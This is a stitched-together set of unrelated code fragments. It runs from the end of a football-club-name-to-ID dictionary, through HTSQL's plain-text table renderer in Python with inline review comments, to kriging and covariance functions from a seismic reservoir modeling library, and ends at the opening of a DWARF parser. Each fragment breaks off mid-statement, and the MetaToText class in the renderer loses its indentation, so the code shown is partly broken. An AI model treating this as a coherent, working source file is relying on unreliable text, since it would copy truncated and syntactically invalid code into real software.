'pécsi mfc': '814f0e43',
'pecs': '814f0e43',
'puskás akadémia': '6cf72eb0',
'puskas akademia': '6cf72eb0',
'rákospalotai eac': '1656f6c9',
'rakospalotai eac': '1656f6c9',
'szolnoki máv': '2abc7dc3',
'szolnok': '2abc7dc3',
'szombathelyi haladás': 'd9995c97',
'haladas': 'd9995c97',
'újpest': '108607cf',
'ujpest': '108607cf',
'vác': 'bd9d2d98',
'vac': 'bd9d2d98',
'vasas': 'bbb935cb',
'zalaegerszegi te': '5f778322',
'zalaegerszeg': '5f778322',
'breiðablik ubk': '4a29fb1c',
'breidablik': '005a8517',
'breidablik ubk': '4a29fb1c',
'fimleikafélag hafnarfjarðar': '9ac2ced1',
'fimleikafelag hafnarfjardar': '9ac2ced1',
'fylkir': '323cb7e4',
'íþróttabandalag akraness': '7ae2a403',
'ithrottabandalag akraness': '7ae2a403',
'íþróttabandalag vestmannaeyja': 'e0afb445',
'ithrottabandalag vestmannaeyja': 'e0afb445',
'keflavík íf': 'a3647d2e',
'keflavik if': 'a3647d2e',
'knattspyrnufélag reykjavíkur': 'ae156985',
'knattspyrnufelag reykjavikur': 'ae156985',
'knattspyrnufélagið fram': '5a8bd0bd',
'knattspyrnufelagid fram': '5a8bd0bd',
'knattspyrnufélagið víkingur': 'ead990c4',
'knattspyrnufelagid vikingur': 'ead990c4',
'leiknir reykjavík': '0c017aa1',
'leiknir reykjavik': '0c017aa1',
'stjarnan': '50fbb58d',
'umf stjarnan': '50fbb58d',
'valur': 'b838366a',
'þór akureyri': '108d3492',
'thor akureyri': '108d3492',
'þór/ka': '6d12ffd1',
'thorka': '6d12ffd1',
'aizawl': '372caef1',
'atk': '48d29768',
'bengaluru': 'd6997457',
'bharat': 'd8b3d23e',
'chennai city': '98d49ef1',
'chennaiyin': '6f0be699',
'churchill brothers goa': '89d54d32',
'churchill brothers': '89d54d32',
'delhi dynamos': '238b245d',
'dempo sc': '800bf6c9',
'dempo': '800bf6c9',
'dsk shivajians': '3d7fb0b3',
'goa': '3249478a',
'pune city': 'f02dca48',
'gokulam kerala': 'db891982',
'hyderabad': 'dd6945f1',
'indian arrows': '6514b7f2',
'jamshedpur': 'abe09747',
'kerala blasters': '38c56c1f',
'minerva punjab': '8f8b1984',
'mohammedan sc': '472a48f2',
'mohammedan': '472a48f2',
'mohun bagan ac': '5c7eb1c7',
'mohun bagan': '5c7eb1c7',
'mumbai city': '1ae5d154',
'mumbai': '9093f7b9',
'neroca': '2a38baa5',
'northeast united': '142886c3',
'pune': 'e64cb540',
'quess east bengal': '366f89ff',
'east bengal': '366f89ff',
'rangdajied united': 'd38f5d45',
'real kashmir': 'd344b030',
'royal wahingdoh': '66314a02',
'salgaocar': '9a006bb8',
'shillong lajong': '5ae2e6b4',
'sporting clube de goa': '47fe048b',
'sporting goa': '47fe048b',
'trau': '9a1cbee5',
'united sc': '00e4df11',
'united': '00e4df11',
'esteghlal ahvaz': '633d46e8',
'esteghlal khuzestan': 'dbad5f2c',
'esteghlal tehran': 'fe550dbf',
'esteghlal': 'fe550dbf',
'nassaji mazandaran': '2c45d10e',
'pars jonoubi jam': '5835aae0',
'foolad khuzestan': 'aa3eb1d3',
'foolad': 'aa3eb1d3',
'gol gohar': '2f5578dd',
'gostaresh foulad': '4bccf0f1',
'machine sazi': '098a7982',
'malavan': 'e4ec7ab0',
'naft masjed soleyman': '3e358749',
'naft tehran': '76d09801',
'padideh shahr-e khodrou': '9f29d583',
'padideh': '9f29d583',
'paykan': 'c659a2f9',
'persepolis': '95f42e44',
'rah ahan tehran': '8f02154a',
'saba qom': 'd9a003fb',
'saipa': '6b849eeb',
'sanat naft abadan': '9fc3b195',
'sepahan sc': 'e39cf61a',
'sepahan': 'e39cf61a',
'sepidrood rasht sc': 'df40b697',
'sepidrood rasht': 'df40b697',
'shahin shahrdari bushehr': '67645960',
'shahin bushehr': '67645960',
'siah jamegan': '9c740560',
'tractor sc': '0230c3aa',
'tractor': '0230c3aa',
'zob ahan sc': 'f8106fc0',
'zob ahan': 'f8106fc0',
'bohemian': '2cf146dc',
'cork city': '4936d1b7',
'derry city': '15f9a98b',
'drogheda united': '359432b5',
'dundalk': 'e4a9d483',
'raheny united': '52be9595',
'shamrock rovers': 'f082c4f3',
'shelbourne': '4f782ba7',
'shelbourne ladies': '4f782ba7',
'sligo rovers': '0baacc84',
'sporting fingal': '4bcb8a56',
"st patrick's athletic": '8a814429',
'st patricks athletic': '8a814429',
'university college dublin afc': '04dcef70',
'wexford youths wfc': '4ef30319',
'wexford youths': '4ef30319',
'asa tel aviv university': '2bec921d',
'beitar jerusalem': '79000faa',
'bnei yehuda tel aviv': '1040e0f7',
'kiryat gat': '889b0f75',
'<NAME>': '931cb21e',
"hapoel be'er sheva": '133013ee',
'hapoel beer sheva': '133013ee',
'hapoel haifa': '8ff9960d',
'hapoel ironi | |
#
# Copyright (c) 2006-2013, Prometheus Research, LLC
#
"""
:mod:`htsql.core.fmt.text`
==========================
This module implements the plain text renderer.
"""
from ..adapter import Adapter, adapt, adapt_many
from ..util import maybe, oneof
from ..context import context
from .format import TextFormat
from .emit import EmitHeaders, Emit
from ..domain import (Domain, BooleanDomain, NumberDomain, IntegerDomain,
DecimalDomain, FloatDomain, TextDomain, EnumDomain, DateDomain,
TimeDomain, DateTimeDomain, ListDomain, RecordDomain, UntypedDomain,
VoidDomain, OpaqueDomain, Profile)
from ..tr.pipe import SQLPipe
import re
import decimal
import datetime
class EmitTextHeaders(EmitHeaders):
    """Produces HTTP headers for plain-text output."""

    adapt(TextFormat)

    def __call__(self):
        # Plain-text output is always served as UTF-8.
        yield ('Content-Type', 'text/plain; charset=UTF-8')
class EmitText(Emit):
    """Renders the output product as a plain-text table, line by line."""

    adapt(TextFormat)

    def __call__(self):
        addon = context.app.htsql
        # NOTE(review): `profile_to_text` is defined elsewhere in this module;
        # it appears to adapt the output profile to a ToText-style renderer —
        # confirm against the rest of the file.
        product_to_text = profile_to_text(self.meta)
        size = product_to_text.size
        if size == 0:
            # Nothing to render (no output columns).
            return
        widths = product_to_text.widths(self.data)
        depth = product_to_text.head_depth()
        head = product_to_text.head(depth)
        if depth > 0:
            # Render the (possibly multi-row) header.  `bar` holds, for each
            # output column, the current header cell text and how many more
            # rows its rowspan still covers.
            bar = [(None, 0)]*size
            for row_idx in range(depth):
                row = next(head, [])
                last_bar = bar
                bar = []
                # Expand this row's (text, rowspan, colspan) cells into one
                # entry per column; columns continued from the previous row
                # just have their remaining rowspan decremented.
                while len(bar) < size:
                    idx = len(bar)
                    text, tail = last_bar[idx]
                    if tail > 0:
                        bar.append((text, tail-1))
                    else:
                        text, rowspan, colspan = row.pop(0)
                        bar.append((text, rowspan-1))
                        for span in range(colspan-1):
                            bar.append((None, rowspan-1))
                assert not row
                if row_idx > 0:
                    # Draw the rule separating this header row from the
                    # previous one, choosing `+`, `-`, `|` or a space at each
                    # junction depending on the neighboring cells.
                    line = [" "]
                    for idx in range(0, size+1):
                        is_horiz = False
                        is_vert = False
                        if idx > 0:
                            text, tail = last_bar[idx-1]
                            if tail == 0:
                                is_horiz = True
                        if idx < size:
                            text, tail = last_bar[idx]
                            if tail == 0:
                                is_horiz = True
                        if idx < size:
                            text, tail = last_bar[idx]
                            if text is not None:
                                is_vert = True
                            text, tail = bar[idx]
                            if text is not None:
                                is_vert = True
                        else:
                            # The rightmost border is always vertical.
                            is_vert = True
                        if is_horiz and is_vert:
                            line.append("+")
                        elif is_horiz:
                            line.append("-")
                        elif is_vert:
                            line.append("|")
                        else:
                            line.append(" ")
                        if idx < size:
                            text, tail = last_bar[idx]
                            if tail == 0:
                                line.append("-"*(widths[idx]+2))
                            else:
                                line.append(" "*(widths[idx]+2))
                        else:
                            line.append("\n")
                    yield "".join(line)
                # Draw the header text row itself; `extent` tracks text that
                # overflows from a spanning cell into the following columns.
                extent = 0
                line = []
                for idx in range(size):
                    text, tail = bar[idx]
                    if text is not None:
                        assert extent == 0, extent
                        line.append(" | ")
                    else:
                        if extent < 3:
                            line.append(" "*(3-extent))
                            extent = 0
                        else:
                            extent -= 3
                    width = widths[idx]
                    if text is not None and tail == 0:
                        # Print the cell text only on the last row of its
                        # rowspan.
                        line.append(text)
                        extent = len(text)
                    if extent < width:
                        line.append(" "*(width-extent))
                        extent = 0
                    else:
                        extent -= width
                assert extent == 0
                line.append(" |\n")
                yield "".join(line)
            # Separator between the header and the data rows.
            line = ["-+-"]
            for width in widths:
                line.append("-"*width)
                line.append("-+-")
            line.append("\n")
            yield "".join(line)
        # Render the data rows; cell boundaries are drawn with `|` when
        # either neighbor is "solid" and with `:` otherwise.
        body = product_to_text.body(self.data, widths)
        for row in body:
            line = []
            is_last_solid = False
            for chunk, is_solid in row:
                if is_last_solid or is_solid:
                    line.append(" | ")
                else:
                    line.append(" : ")
                line.append(chunk)
                is_last_solid = is_solid
            if is_last_solid:
                line.append(" |\n")
            else:
                line.append(" :\n")
            yield "".join(line)
        yield "\n"
        # In debug mode, append the original query syntax and the generated
        # SQL (when available) as a footer.
        if addon.debug and (self.meta.syntax or hasattr(self.product, 'sql')):
            yield " ----\n"
            if self.meta.syntax:
                yield " %s\n" % self.meta.syntax
            if hasattr(self.product, 'sql'):
                # Replace control characters which would corrupt the output.
                sql = re.sub(r'[\0-\x09\x0b-\x1f\x7f]', '\ufffd',
                             self.product.sql)
                for line in sql.splitlines():
                    if line:
                        yield " %s\n" % line
                    else:
                        yield "\n"
class ToText(Adapter):
    """
    Base adapter rendering a single domain value as one text-table column.

    Subclasses specialize formatting per domain; the `head`/`body`/`widths`
    trio produces header cells, body rows and preferred column widths.
    """
    adapt(Domain)
    def __init__(self, domain):
        # `domain` knows how to serialize raw values; `size` is the number
        # of output columns this adapter occupies (1 for scalar domains).
        self.domain = domain
        self.size = 1
    def __call__(self):
        return self
    def head_depth(self):
        # Scalar domains contribute no header rows of their own.
        return 0
    def head(self, depth):
        # Emit a single blank header cell spanning `depth` rows and
        # `self.size` columns; emit nothing for zero-width adapters.
        if not self.size or not depth:
            return
        yield [("", depth, self.size)]
    def body(self, data, widths):
        # One body row: the dumped value left-aligned ("%*s" with a
        # negative width pads on the right).
        [width] = widths
        cell = self.dump(data)
        yield [("%*s" % (-width, cell), True)]
    def widths(self, data):
        # Natural column width for this value.
        return [len(self.dump(data))]
    def dump(self, value):
        # NULL renders as an empty string; otherwise defer to the domain.
        if value is None:
            return ""
        return self.domain.dump(value)
class TextToText(ToText):
    """
    Renders text-like values, quoting/escaping when needed and
    word-wrapping long strings over several body rows.
    """
    adapt_many(UntypedDomain,
               TextDomain,
               EnumDomain)
    # Strings longer than this are candidates for wrapping.
    threshold = 32
    # A breakable position: a single space between two non-space characters.
    boundary_pattern = r"""(?<=\S) (?=\S)"""
    boundary_regexp = re.compile(boundary_pattern)
    # Values safe to show verbatim: printable, no leading/trailing space
    # and not starting or ending with a double quote.
    unescaped_pattern = r"""\A(?=[^ "])[^\x00-\x1F]+(?<=[^ "])\Z"""
    unescaped_regexp = re.compile(unescaped_pattern)
    # Characters that must be escaped inside a quoted string.
    escape_pattern = r"""[\x00-\x1F"\\]"""
    escape_regexp = re.compile(escape_pattern)
    escape_table = {
            '\\': '\\\\',
            '"': '\\"',
            '\b': '\\b',
            '\f': '\\f',
            '\n': '\\n',
            '\r': '\\r',
            '\t': '\\t',
    }
    def escape_replace(self, match):
        # Replace one forbidden character with its escape sequence,
        # falling back to \uXXXX for characters without a short form.
        char = match.group()
        if char in self.escape_table:
            return self.escape_table[char]
        return "\\u%04x" % ord(char)
    def escape(self, value):
        # Quote and escape the value unless it is safe to show verbatim.
        if self.unescaped_regexp.match(value):
            return value
        return '"%s"' % self.escape_regexp.sub(self.escape_replace, value)
    def body(self, data, widths):
        """
        Yields the cell rows for `data`, wrapping onto multiple rows when
        the value does not fit into the column width.
        """
        [width] = widths
        if data is None:
            yield [(" "*width, True)]
            return
        value = self.escape(data)
        if len(value) <= width:
            yield [("%*s" % (-width, value), True)]
            return
        # Wrap: split into words, then pick, for each prefix, the best
        # grouping of trailing words into the last line.  The badness of
        # a layout is the sum of squared trailing whitespace over all
        # lines but the last (dynamic programming over word indices).
        chunks = self.boundary_regexp.split(value)
        best_badnesses = []
        best_lengths = []
        best_sizes = []
        for idx in range(len(chunks)):
            chunk = chunks[idx]
            best_badness = None
            best_size = None
            best_length = None
            length = len(chunk)
            size = 1
            # Try taking the last `size` words (ending at `idx`) as one line.
            while length <= width and idx-size >= -1:
                if size > idx:
                    # The whole prefix fits on a single line: no penalty.
                    badness = 0
                else:
                    tail = width - best_lengths[idx-size]
                    badness = best_badnesses[idx-size] + tail*tail
                if best_badness is None or best_badness > badness:
                    best_badness = badness
                    best_size = size
                    best_length = length
                if idx >= size:
                    # Extend the candidate line by one more word (+1 space).
                    length += len(chunks[idx-size]) + 1
                size += 1
            assert best_badness is not None and best_length <= width
            best_badnesses.append(best_badness)
            best_lengths.append(best_length)
            best_sizes.append(best_size)
        # Reconstruct the chosen line groups from the end backwards.
        lines = []
        idx = len(chunks)
        while idx > 0:
            size = best_sizes[idx-1]
            group = " ".join(chunks[idx-size:idx])
            assert len(group) <= width
            line = "%*s" % (-width, group)
            lines.insert(0, line)
            idx -= size
        # Only the first row of a wrapped cell is "solid" (starts a value).
        is_first = True
        for line in lines:
            yield [(line, is_first)]
            is_first = False
    def widths(self, data):
        """
        Preferred column width: full length for short values, otherwise
        the widest word group that fits within the wrapping threshold.
        """
        if data is None:
            return [0]
        value = self.escape(data)
        if len(value) <= self.threshold:
            return [len(value)]
        chunks = self.boundary_regexp.split(value)
        max_length = max(len(chunk) for chunk in chunks)
        if max_length >= self.threshold:
            # A single unbreakable word dictates the minimum width.
            return [max_length]
        # Sliding window over words: widest run of consecutive words
        # (with single-space separators) still within the threshold.
        max_length = length = 0
        start = end = 0
        while end < len(chunks):
            length += len(chunks[end])
            if end != 0:
                length += 1
            end += 1
            while length > self.threshold:
                length -= len(chunks[start])
                if start != 0:
                    length -= 1
                start += 1
            assert start < end
            if length > max_length:
                max_length = length
        return [max_length]
class NativeStringToText(ToText):
    """
    Renders values whose native str() form is the display form.
    """
    adapt_many(NumberDomain,
               DateDomain,
               TimeDomain)
    def dump(self, value):
        # NULL renders as an empty string.
        if value is None:
            return ""
        return str(value)
class NumberToText(NativeStringToText):
    """
    Renders numeric values right-aligned within the column.
    """
    adapt(NumberDomain)
    def body(self, data, widths):
        # "%*s" with a positive width pads on the left, so numbers line
        # up against the right edge of the column.
        [cell_width] = widths
        yield [("%*s" % (cell_width, self.dump(data)), True)]
class DecimalToText(ToText):
    """
    Renders Decimal values with up to 12 significant digits.
    """
    adapt(DecimalDomain)
    def dump(self, value):
        # NULL renders as an empty string.
        if value is None:
            return ""
        sign, digits, exp = value.as_tuple()
        # Zero (no digits) keeps its native representation.
        if not digits:
            return str(value)
        # Drop an excessive negative exponent when normalization is lossless.
        if exp < -6 and value == value.normalize():
            value = value.normalize()
            sign, digits, exp = value.as_tuple()
        if exp > 0:
            # Guard against InvalidOperation:
            # quantize result has too many digits for current context
            if exp+len(digits) < 28:
                value = value.quantize(decimal.Decimal(1))
        return "{:.12}".format(value)
class FloatToText(ToText):
    """
    Renders floating-point values with up to 12 significant digits.
    """
    adapt(FloatDomain)
    def dump(self, value):
        # NULL renders as an empty string.
        return "" if value is None else "{:.12}".format(value)
class DateTimeToText(ToText):
    """
    Renders datetime values, showing only the date when the time part
    evaluates falsy.
    """
    adapt(DateTimeDomain)
    def dump(self, value):
        if value is None:
            return ""
        # NOTE(review): datetime.time(0, 0) is truthy on Python >= 3.5,
        # so the date-only branch fires only on older interpreters --
        # confirm the intended behavior for midnight timestamps.
        if not value.time():
            return str(value.date())
        return str(value)
class OpaqueToText(ToText):
    """
    Renders values of opaque (unspecified) domains via their str() form.
    """
    adapt(OpaqueDomain)
    def dump(self, value):
        # NULL renders as an empty string.
        return "" if value is None else str(value)
class VoidToText(ToText):
    """
    Renders the void domain: occupies no output columns at all.
    """
    adapt(VoidDomain)
    def __init__(self, domain):
        super(VoidToText, self).__init__(domain)
        # Zero columns: head()/body() consequently produce no cells.
        self.size = 0
class RecordToText(ToText):
    """
    Renders record values: one group of columns per record field,
    merged side by side row after row.
    """
    adapt(RecordDomain)
    def __init__(self, domain):
        super(RecordToText, self).__init__(domain)
        # One renderer per field; total column count is the sum of
        # per-field column counts.
        self.fields_to_text = [profile_to_text(field)
                               for field in domain.fields]
        self.size = sum(field_to_text.size
                        for field_to_text in self.fields_to_text)
    def head_depth(self):
        # Header depth is dictated by the deepest field.
        if not self.size:
            return 0
        return max(field_to_text.head_depth()
                   for field_to_text in self.fields_to_text)
    def head(self, depth):
        # Merge header rows of all fields side by side until every
        # field's header stream is exhausted.
        if not self.size or not depth:
            return
        streams = [field_to_text.head(depth)
                   for field_to_text in self.fields_to_text]
        is_done = False
        while not is_done:
            is_done = True
            row = []
            for stream in streams:
                subrow = next(stream, None)
                if subrow is not None:
                    row.extend(subrow)
                    is_done = False
            if not is_done:
                yield row
    def body(self, data, widths):
        # Merge body rows of all fields side by side; fields that run
        # out of rows are padded with blank cells so columns stay aligned.
        if not self.size:
            return
        # Blank filler cells, one per output column.
        dummies = [(" "*width, False) for width in widths]
        if data is None:
            yield dummies
            return
        streams = []
        start = 0
        for field_to_text, item in zip(self.fields_to_text, data):
            size = field_to_text.size
            # Each field consumes its own slice of the width list.
            stream = field_to_text.body(item, widths[start:start+size])
            streams.append((stream, size))
            start += size
        is_done = False
        while not is_done:
            is_done = True
            row = []
            for stream, size in streams:
                subrow = next(stream, None)
                if subrow is not None:
                    row.extend(subrow)
                    is_done = False
                else:
                    # Field exhausted: pad its columns with blanks.
                    row.extend(dummies[len(row):len(row)+size])
            if not is_done:
                yield row
    def widths(self, data):
        # Concatenate per-field preferred widths.
        widths = []
        if data is None:
            data = [None]*self.size
        for item, field_to_text in zip(data, self.fields_to_text):
            widths += field_to_text.widths(item)
        return widths
class ListToText(ToText):
    """
    Renders list values: items are stacked vertically, sharing the
    item domain's columns.
    """
    adapt(ListDomain)
    def __init__(self, domain):
        # NOTE(review): does not call ToText.__init__, so `self.domain`
        # is never set here -- presumably unused for lists; confirm.
        self.item_to_text = to_text(domain.item_domain)
        self.size = self.item_to_text.size
    def head_depth(self):
        # Header comes entirely from the item renderer.
        return self.item_to_text.head_depth()
    def head(self, depth):
        return self.item_to_text.head(depth)
    def body(self, data, widths):
        # Concatenate the body rows of all items; empty/NULL lists
        # produce no rows at all.
        if not data:
            return
        for item in data:
            for row in self.item_to_text.body(item, widths):
                yield row
    def widths(self, data):
        # Column-wise maximum over all items (a single NULL item stands
        # in for an empty list so widths are still well-defined).
        widths = [0]*self.size
        if not data:
            data = [None]
        for item in data:
            widths = [max(width, item_width)
                      for width, item_width
                      in zip(widths, self.item_to_text.widths(item))]
        return widths
class MetaToText:
def __init__(self, profile):
self.profile = profile
self.domain_to_text = to_text(profile.domain)
self.size = self.domain_to_text.size
def head_depth(self):
depth = self.domain_to_text.head_depth()
if self.profile.header:
depth += 1
return | |
<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 20:05:53 2020
@author: dariograna
"""
import numpy as np
import numpy.matlib
from numpy.linalg import matrix_power
import scipy .spatial
def CorrelatedSimulation(mprior, sigma0, sigmaspace):
    """
    CORRELATED SIMULATION
    Generates one 1D stochastic realization of multiple correlated
    random variables with a spatial correlation model.

    Parameters
    ----------
    mprior : array_like
        Prior trend (nsamples, nvariables).
    sigma0 : array_like
        Stationary covariance matrix (nvariables, nvariables).
    sigmaspace : array_like
        Spatial covariance matrix (nsamples, nsamples).

    Returns
    -------
    msim : array_like
        Stochastic realization (nsamples, nvariables).

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.6
    """
    nsamp, nvar = mprior.shape
    # Covariance of the stacked vector: the Kronecker product couples the
    # inter-variable covariance with the spatial covariance.
    bigsigma = np.kron(sigma0, sigmaspace)
    # One correlated draw of all variables stacked variable-by-variable
    # (variable i occupies entries [i*nsamp, (i+1)*nsamp)).
    stacked = np.random.multivariate_normal(mprior.T.flatten(), bigsigma)
    # Unstack the (nvar, nsamp) blocks back into (nsamp, nvar) columns.
    return stacked.reshape(nvar, nsamp).T
def ExpCov(h, l):
    """
    EXP COV
    Exponential covariance function C(h) = exp(-3 h / l).

    Parameters
    ----------
    h : float or array_like
        Distance.
    l : float or array_like
        Correlation length (or range).

    Returns
    -------
    C : array_like
        Covariance: 1 at h = 0, decaying to about 0.05 at h = l.

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.2
    """
    return np.exp(-3.0 * h / l)
def GauCov(h, l):
    """
    GAU COV
    Gaussian covariance function C(h) = exp(-3 h^2 / l^2).

    Parameters
    ----------
    h : float or array_like
        Distance.
    l : float or array_like
        Correlation length (or range).

    Returns
    -------
    C : array_like
        Covariance: 1 at h = 0, decaying to about 0.05 at h = l.

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.2
    """
    return np.exp(-3.0 * h ** 2 / l ** 2)
def SphCov(h, l):
    """
    SPH COV
    Spherical covariance function:
    C(h) = 1 - (3/2)(h/l) + (1/2)(h/l)^3 for h <= l, and 0 beyond the range.

    Parameters
    ----------
    h : array_like
        Distances.
    l : float or array_like
        Correlation length (or range).

    Returns
    -------
    C : array_like
        Covariance, same shape as h.

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.2
    """
    C = np.zeros(h.shape)
    # Beyond the range the covariance is exactly zero, so only in-range
    # entries need evaluating.
    inside = h <= l
    C[inside] = 1 - 3 / 2 * h[inside] / l + 1 / 2 * h[inside] ** 3 / l ** 3
    return C
def GaussianSimulation(xcoord, dcoords, dvalues, xmean, xvar, l, krigtype, krig):
    """
    GAUSSIAN SIMULATION
    Draws one realization of the random variable conditioned on the
    available measurements.

    Parameters
    ----------
    xcoord : array_like
        Coordinates of the location for the estimation (1, ndim).
    dcoords : array_like
        Coordinates of the measurements (ns, ndim).
    dvalues : array_like
        Values of the measurements (ns, 1).
    xmean : float
        Prior mean.
    xvar : float
        Prior variance.
    l : float
        Correlation length.
    krigtype : str
        Function type ('exp', 'gau', 'sph').
    krig : int
        Kriging type (0=simple, 1=ordinary).

    Returns
    -------
    sgsim : array_like
        Realization (nsamples, nvariables).

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.5
    """
    # Conditional moments from kriging: simple kriging uses the known
    # prior mean, ordinary kriging estimates the mean from the data.
    if krig == 0:
        cond_mean, cond_var = SimpleKriging(xcoord, dcoords, dvalues, xmean, xvar, l, krigtype)
    else:
        cond_mean, cond_var = OrdinaryKriging(xcoord, dcoords, dvalues, xvar, l, krigtype)
    # Sample from N(cond_mean, cond_var).
    return cond_mean + np.sqrt(cond_var) * np.random.randn(1)
def IndicatorKriging(xcoord, dcoords, dvalues, nf, pprior, l, krigtype):
    """
    INDICATOR KRIGING
    Computes the indicator kriging estimate and variance.

    Parameters
    ----------
    xcoord : array_like
        Coordinates of the location for the estimation (1, ndim).
    dcoords : array_like
        Coordinates of the measurements (ns, ndim).
    dvalues : array_like
        Values of the measurements (ns, 1).
    nf : int
        Number of possible outcomes (e.g. number of facies).
    pprior : array_like
        Prior probability (1, nf).
    l : float or array_like
        Correlation range, for different range for each facies
        (array with nf components).
    krigtype : str
        Function type ('exp', 'gau', 'sph') for different type for each facies,
        (array with nf components).

    Returns
    -------
    ikp : array_like
        Indicator kriging probability.
    ikmap : array_like
        Maximum a posteriori of indicator kriging probability.

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 4.1
    """
    # If l and krigtype are single parameters, use it for all facies
    # NOTE(review): the scalar check uses type()==float / type()==str, so
    # an int range or numpy scalar would not be broadcast -- confirm.
    if type(l)==float:
        l = np.tile(l, (nf, 1))
    if type(krigtype)==str:
        krigtype = np.tile(krigtype, (nf, 1))
    # indicator variables: one-hot encode each measured facies value.
    nd = dvalues.shape[0]
    indvar = np.zeros((nd, nf))
    for i in range(nd):
        indvar[i, dvalues[i].astype(int)] = 1
    # kriging weights: distances between the target point (row/col 0)
    # and the data points.
    xdtemp = scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(np.vstack((xcoord, dcoords))))
    distvect = xdtemp[1:,0]
    distmatr = xdtemp[1:,1:]
    varprior = np.zeros((1,nf))
    krigvect = np.zeros((nd,nf))
    krigmatr = np.zeros((nd,nd,nf))
    wkrig = np.zeros((nd, nf))
    for j in range(nf):
        # Indicator variance of a Bernoulli variable: p(1-p).
        varprior[:,j]= pprior[j] * (1 - pprior[j])
        krigvect[:,j]= varprior[:,j] * SpatialCovariance1D(distvect, l[j], krigtype[j])
        krigmatr[:,:,j] = varprior[:,j] * SpatialCovariance1D(distmatr, l[j], krigtype[j])
        # Least squares is used instead of a direct solve for robustness.
        wkrig[:,j] = np.linalg.lstsq(krigmatr[:,:,j], krigvect[:,j],rcond=None)[0]
    # indicator kriging probability: prior updated by weighted residuals.
    ikp = np.zeros((1, nf))
    for j in range(nf):
        ikp[0,j] = pprior[j] + sum(wkrig[:,j] * (indvar[:,j]- pprior[j]))
    # Should we only normalize ikp, do we have to truncate?
    #ikp[ikp<0] = 0;ikp[ikp>1] = 1
    ikp = ikp/ikp.sum()
    ikmap = np.argmax(ikp, axis=1)
    return ikp, ikmap
def OrdinaryKriging(xcoord, dcoords, dvalues, xvar, l, krigtype):
    """
    ORDINARY KRIGING
    Computes the ordinary kriging estimate and variance.

    Parameters
    ----------
    xcoord : array_like
        Coordinates of the location for the estimation (1, ndim).
    dcoords : array_like
        Coordinates of the measurements (ns, ndim).
    dvalues : array_like
        Values of the measurements (ns, 1).
    xvar : float
        Prior variance.
    l : float
        Correlation length
    krigtype : str
        Function type ('exp', 'gau', 'sph').

    Returns
    -------
    xok : array_like
        Kriging estimate.
    xvarok : array_like
        Kriging variance.

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.4
    """
    # kriging matrix and vector: the extra row/column of ones encodes the
    # unbiasedness constraint (weights sum to 1) with a Lagrange multiplier.
    nd = dcoords.shape[0]
    krigmatr = np.ones((nd + 1, nd + 1))
    krigvect = np.ones((nd + 1, 1))
    # Row/column 0 of the distance matrix relates the target point to the data.
    xdtemp = scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(np.vstack((xcoord, dcoords))))
    distvect = xdtemp[1:,0]
    distmatr = xdtemp[1:,1:]
    krigvect[0:-1,0] = xvar * SpatialCovariance1D(distvect, l, krigtype)
    krigmatr[0:-1,0:-1] = xvar * SpatialCovariance1D(distmatr, l, krigtype)
    krigmatr[-1,-1] = 0
    # to avoid numerical issue, specially with Gaussian variogram model
    krigmatr = krigmatr + 0.000001*xvar*np.eye(krigmatr.shape[0])
    # kriging weights (last entry is the Lagrange multiplier).
    wkrig = np.linalg.lstsq(krigmatr, krigvect,rcond=None)[0]
    # kriging mean: weights sum to 1, so the plain weighted sum equals the
    # residual form in the MATLAB reference below.
    # xok = mean(dvalues)+sum(wkrig(1:end-1).*(dvalues-mean(dvalues)));
    xok = np.sum(wkrig[0:- 1] * dvalues)
    # kriging variance
    xvarok = xvar - np.sum(wkrig * krigvect)
    return xok, xvarok
def SimpleKriging(xcoord, dcoords, dvalues, xmean, xvar, l, krigtype):
    """
    SIMPLE KRIGING
    Computes the simple kriging estimate and variance.

    Parameters
    ----------
    xcoord : array_like
        Coordinates of the location for the estimation (1, ndim).
    dcoords : array_like
        Coordinates of the measurements (ns, ndim).
    dvalues : array_like
        Values of the measurements (ns, 1).
    xmean : float
        Prior mean.
    xvar : float
        Prior variance.
    l : float
        Correlation length.
    krigtype : str
        Function type ('exp', 'gau', 'sph').

    Returns
    -------
    xsk : array_like
        Kriging estimate.
    xvarsk : array_like
        Kriging variance.

    References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley - Chapter 3.4
    """
    ndata = dcoords.shape[0]
    # Pairwise distances among [target; data] locations: row/column 0
    # relates the estimation point to the data points.
    alldist = scipy.spatial.distance.squareform(
        scipy.spatial.distance.pdist(np.vstack((xcoord, dcoords))))
    target_dist = alldist[1:, 0]
    data_dist = alldist[1:, 1:]
    # Covariance vector (target vs data) and matrix (data vs data).
    krigvect = np.ones((ndata, 1))
    krigvect[:, 0] = xvar * SpatialCovariance1D(target_dist, l, krigtype)
    krigmatr = xvar * SpatialCovariance1D(data_dist, l, krigtype)
    # Small diagonal nugget avoids ill-conditioning, especially with the
    # Gaussian variogram model.
    krigmatr = krigmatr + 0.000001 * xvar * np.eye(krigmatr.shape[0])
    # Kriging weights via least squares (robust to near-singular systems).
    wkrig = np.linalg.lstsq(krigmatr, krigvect, rcond=None)[0]
    # Kriging mean: prior mean plus weighted residuals.
    xsk = xmean + np.sum(wkrig * (dvalues - xmean))
    # Kriging variance: prior variance reduced by the explained part.
    xvarsk = xvar - np.sum(wkrig * krigvect)
    return xsk, xvarsk
def MarkovChainSimulation(T, ns, nsim):
"""
MARKOV CHAIN SIMULATION
Simulates 1D realizations of a discrete random variable based on
a stationary first-order Markov chain with given transition probability matrix.
Written by <NAME> (August 2020)
Parameters
----------
T : array_like
Transition probability matrix.
ns : int
Number of samples.
nsim : int
Number of simulations.
Returns
-------
fsim : array_like
Realizations (ns, nsim).
References: Grana, Mukerji, Doyen, 2021, Seismic Reservoir Modeling: Wiley | |
#!/usr/bin/env python3
"""
DWARF parser minimal implementation.
All references unless stated otherwise are for:
DWARF v3, December 20, 2005
"""
"""
Enumeration examples
